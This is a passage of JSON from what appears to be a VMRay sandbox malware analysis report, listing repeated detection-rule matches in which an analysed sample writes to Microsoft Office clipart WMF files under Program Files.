"operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42860", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00352_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00364_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00364_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42871", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00364_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00367_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00367_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42878", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00367_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00373_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00373_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42887", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00373_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00382_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00382_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42894", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00382_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00390_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00390_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42901", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00390_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00391_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00391_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42908", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00391_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00416_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00416_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42915", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00416_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00423_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00423_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42924", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00423_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00444_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00444_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42931", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00444_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00452_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00452_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42938", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00452_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00453_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00453_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42945", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00453_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00454_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00454_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42954", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00454_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00466_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00466_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42961", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00466_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00476_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00476_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42968", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00476_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00479_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00479_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42975", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00479_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00483_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00483_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42984", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00483_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00486_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00486_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42991", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00486_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00505_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00505_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42998", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00505_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00513_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00513_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43005", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00513_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00555_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00555_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43012", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00555_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00603_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00603_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43019", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00603_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00610_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43028", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00610_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00629_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00629_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43039", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00629_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00633_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00633_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43046", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00633_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00638_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00638_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43055", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00638_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00656_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00656_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43062", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00656_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00668_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00668_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43069", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00668_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00670_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00670_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43076", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00670_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00671_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00671_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43083", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00671_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00683_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00683_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43090", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00683_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00694_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00694_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43099", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00694_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00704_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00704_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43108", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00704_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft 